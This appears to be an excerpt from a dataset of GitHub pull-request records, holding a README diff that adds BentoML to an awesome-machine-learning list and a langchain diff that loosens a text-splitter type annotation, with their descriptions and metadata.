| https://api.github.com/repos/AUTOMATIC1111/stable-diffusion-webui/pulls/12311 | 2023-08-04T11:08:11Z | 2023-08-05T06:24:26Z | 2023-08-05T06:24:26Z | 2023-09-04T21:36:50Z | 3,657 | AUTOMATIC1111/stable-diffusion-webui | 39,713 |
Add bentoML for python general purpose section | diff --git a/README.md b/README.md
index 46368eb6..8ed71fbc 100644
--- a/README.md
+++ b/README.md
@@ -1010,6 +1010,7 @@ be
* [Gorgonia](https://github.com/gorgonia/gorgonia) - Gorgonia is a library that helps facilitate machine learning in Golang.
* [Microsoft Recommenders](https://github.com/Microsoft/Recommenders): Examples and best practices for building recommendation systems, provided as Jupyter notebooks. The repo contains some of the latest state of the art algorithms from Microsoft Research as well as from other companies and institutions.
* [StellarGraph](https://github.com/stellargraph/stellargraph): Machine Learning on Graphs, a Python library for machine learning on graph-structured (network-structured) data.
+* [BentoML](https://github.com/bentoml/bentoml): Toolkit for package and deploy machine learning models for serving in production
<a name="python-data-analysis"></a>
#### Data Analysis / Data Visualization
| Hi @josephmisiti
Thank you for putting together this awesome list. I would like to add BentoML for Python's general purpose ML section. It is a toolkit that package and deploy model to production.
| https://api.github.com/repos/josephmisiti/awesome-machine-learning/pulls/601 | 2019-04-15T18:47:41Z | 2019-04-15T19:24:23Z | 2019-04-15T19:24:23Z | 2019-04-15T19:24:23Z | 236 | josephmisiti/awesome-machine-learning | 52,033 |
Fix typing in WebResearchRetriver | diff --git a/libs/langchain/langchain/retrievers/web_research.py b/libs/langchain/langchain/retrievers/web_research.py
index e8e96a2abccc75..cf53243c66b797 100644
--- a/libs/langchain/langchain/retrievers/web_research.py
+++ b/libs/langchain/langchain/retrievers/web_research.py
@@ -16,7 +16,7 @@
from langchain.prompts import BasePromptTemplate, PromptTemplate
from langchain.pydantic_v1 import BaseModel, Field
from langchain.schema import BaseRetriever, Document
-from langchain.text_splitter import RecursiveCharacterTextSplitter
+from langchain.text_splitter import RecursiveCharacterTextSplitter, TextSplitter
from langchain.utilities import GoogleSearchAPIWrapper
from langchain.vectorstores.base import VectorStore
@@ -75,7 +75,7 @@ class WebResearchRetriever(BaseRetriever):
llm_chain: LLMChain
search: GoogleSearchAPIWrapper = Field(..., description="Google Search API Wrapper")
num_search_results: int = Field(1, description="Number of pages per Google search")
- text_splitter: RecursiveCharacterTextSplitter = Field(
+ text_splitter: TextSplitter = Field(
RecursiveCharacterTextSplitter(chunk_size=1500, chunk_overlap=50),
description="Text splitter for splitting web pages into chunks",
)
| Hello @hwchase17
**Issue**:
The class WebResearchRetriever accept only RecursiveCharacterTextSplitter, but never uses a specification of this class. I propose to change the type to TextSplitter. Then, the lint can accept all subtypes.
| https://api.github.com/repos/langchain-ai/langchain/pulls/10734 | 2023-09-18T11:48:54Z | 2023-09-18T15:17:11Z | 2023-09-18T15:17:11Z | 2023-09-18T15:17:11Z | 307 | langchain-ai/langchain | 43,136 |